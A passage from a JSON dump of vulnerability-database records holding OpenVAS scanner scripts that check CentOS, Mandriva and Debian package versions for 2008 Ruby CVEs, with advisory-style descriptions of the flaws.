OpenVAS Vulnerability Test\n#\n# CentOS Update for irb CESA-2008:0897 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n The Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\n and a fixed source port when sending DNS requests. A remote attacker could\n use this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n \n Ruby's XML document parsing module (REXML) was prone to a denial of service\n attack via XML documents with large XML entity definitions recursion. A\n specially-crafted XML file could cause a Ruby application using the REXML\n module to use an excessive amount of CPU and memory. (CVE-2008-3790)\n \n An insufficient "taintness" check flaw was discovered in Ruby's DL module,\n which provides direct access to the C language functions. An attacker could\n use this flaw to bypass intended safe-level restrictions by calling\n external C functions with the arguments from an untrusted tainted inputs.\n (CVE-2008-3657)\n \n A denial of service flaw was discovered in WEBrick, Ruby's HTTP server\n toolkit. A remote attacker could send a specially-crafted HTTP request to a\n WEBrick server that would cause the server to use an excessive amount of\n CPU time. (CVE-2008-3656)\n \n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"irb on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015355.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880222\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0897\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_name( \"CentOS Update for irb CESA-2008:0897 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of irb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:57:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "Check for the Version of irb", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880222", "href": "http://plugins.openvas.org/nasl.php?oid=880222", "type": "openvas", "title": "CentOS Update for irb CESA-2008:0897 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for irb CESA-2008:0897 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n The Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\n and a fixed source port when sending DNS requests. A remote attacker could\n use this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n \n Ruby's XML document parsing module (REXML) was prone to a denial of service\n attack via XML documents with large XML entity definitions recursion. A\n specially-crafted XML file could cause a Ruby application using the REXML\n module to use an excessive amount of CPU and memory. (CVE-2008-3790)\n \n An insufficient "taintness" check flaw was discovered in Ruby's DL module,\n which provides direct access to the C language functions. An attacker could\n use this flaw to bypass intended safe-level restrictions by calling\n external C functions with the arguments from an untrusted tainted inputs.\n (CVE-2008-3657)\n \n A denial of service flaw was discovered in WEBrick, Ruby's HTTP server\n toolkit. A remote attacker could send a specially-crafted HTTP request to a\n WEBrick server that would cause the server to use an excessive amount of\n CPU time. (CVE-2008-3656)\n \n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"irb on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015355.html\");\n script_id(880222);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0897\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_name( \"CentOS Update for irb CESA-2008:0897 centos4 i386\");\n\n script_summary(\"Check for the Version of irb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "Check for the Version of irb", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:1361412562310880070", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880070", "type": "openvas", "title": "CentOS Update for irb CESA-2008:0897 centos4 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for irb CESA-2008:0897 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n The Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\n and a fixed source port when sending DNS requests. A remote attacker could\n use this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n \n Ruby's XML document parsing module (REXML) was prone to a denial of service\n attack via XML documents with large XML entity definitions recursion. A\n specially-crafted XML file could cause a Ruby application using the REXML\n module to use an excessive amount of CPU and memory. (CVE-2008-3790)\n \n An insufficient "taintness" check flaw was discovered in Ruby's DL module,\n which provides direct access to the C language functions. An attacker could\n use this flaw to bypass intended safe-level restrictions by calling\n external C functions with the arguments from an untrusted tainted inputs.\n (CVE-2008-3657)\n \n A denial of service flaw was discovered in WEBrick, Ruby's HTTP server\n toolkit. A remote attacker could send a specially-crafted HTTP request to a\n WEBrick server that would cause the server to use an excessive amount of\n CPU time. (CVE-2008-3656)\n \n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"irb on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015354.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880070\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0897\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_name( \"CentOS Update for irb CESA-2008:0897 centos4 x86_64\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of irb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "Check for the Version of ruby", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "id": "OPENVAS:830489", "href": "http://plugins.openvas.org/nasl.php?oid=830489", "type": "openvas", "title": "Mandriva Update for ruby MDVSA-2008:226 (ruby)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for ruby MDVSA-2008:226 (ruby)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A denial of service condition was found in Ruby's regular expression\n engine. If a Ruby script tried to process a large amount of data\n via a regular expression, it could cause Ruby to enter an infinite\n loop and crash (CVE-2008-3443).\n\n A number of flaws were found in Ruby that could allow an attacker to\n create a carefully crafted script that could allow for the bypass of\n certain safe-level restrictions (CVE-2008-3655).\n \n A denial of service vulnerability was found in Ruby's HTTP server\n toolkit, WEBrick. A remote attacker could send a specially-crafted\n HTTP request to a WEBrick server that would cause it to use an\n excessive amount of CPU time (CVE-2008-3656).\n \n An insufficient taintness check issue was found in Ruby's DL module,\n a module that provides direct access to the C language functions.\n This flaw could be used by an attacker to bypass intended safe-level\n restrictions by calling external C functions with the arguments from\n an untrusted tainted input (CVE-2008-3657).\n \n A denial of service condition in Ruby's XML document parsing module\n (REXML) could cause a Ruby application using the REXML module to use\n an excessive amount of CPU and memory via XML documents with large\n XML entity definitions recursion (CVE-2008-3790).\n \n The Ruby DNS resolver library used predictable transaction IDs and\n a fixed source port when sending DNS requests. This could be used\n by a remote attacker to spoof a malicious reply to a DNS query\n (CVE-2008-3905).\n \n The updated packages have been patched to correct these issues.\";\n\ntag_affected = \"ruby on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2008.1,\n Mandriva Linux 2008.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-11/msg00002.php\");\n script_id(830489);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:18:58 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"MDVSA\", value: \"2008:226\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_name( \"Mandriva Update for ruby MDVSA-2008:226 (ruby)\");\n\n script_summary(\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.6~5.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.6~5.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-doc\", rpm:\"ruby-doc~1.8.6~5.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tk\", rpm:\"ruby-tk~1.8.6~5.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.6~9p114.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.6~9p114.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-doc\", rpm:\"ruby-doc~1.8.6~9p114.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tk\", rpm:\"ruby-tk~1.8.6~9p114.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "The remote host is missing an update to ruby1.9\nannounced via advisory DSA 1652-1.", "modified": "2017-07-07T00:00:00", "published": "2008-11-01T00:00:00", "id": "OPENVAS:61774", "href": "http://plugins.openvas.org/nasl.php?oid=61774", "type": "openvas", "title": "Debian Security Advisory DSA 1652-1 (ruby1.9)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1652_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1652-1 (ruby1.9)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in the interpreter for\nthe Ruby language, which may lead to denial of service and other\nsecurity problems. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-3655\n\nKeita Yamaguchi discovered that several safe level restrictions\nare insufficiently enforced.\n\nCVE-2008-3656\n\nChristian Neukirchen discovered that the WebRick module uses\ninefficient algorithms for HTTP header splitting, resulting in\ndenial of service through resource exhaustion.\n\nCVE-2008-3657\n\nIt was discovered that the dl module doesn't perform taintness\nchecks.\n\nCVE-2008-3790\n\nLuka Treiber and Mitja Kolsek discovered that recursively nested\nXML entities can lead to denial of service through resource\nexhaustion in rexml.\n\nCVE-2008-3905\n\nTanaka Akira discovered that the resolv module uses sequential\ntransaction IDs and a fixed source port for DNS queries, which\nmakes it more vulnerable to DNS spoofing attacks.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.9.0+20060609-1etch3. Packages for arm will be provided later.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.9.0.2-6.\n\nWe recommend that you upgrade your ruby1.9 packages.\";\ntag_summary = \"The remote host is missing an update to ruby1.9\nannounced via advisory DSA 1652-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201652-1\";\n\n\nif(description)\n{\n script_id(61774);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-11-01 01:55:10 +0100 (Sat, 01 Nov 2008)\");\n script_cve_id(\"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Debian Security Advisory DSA 1652-1 (ruby1.9)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"rdoc1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irb1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9-examples\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9-elisp\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ri1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbm-ruby1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libopenssl-ruby1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.9-dbg\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = 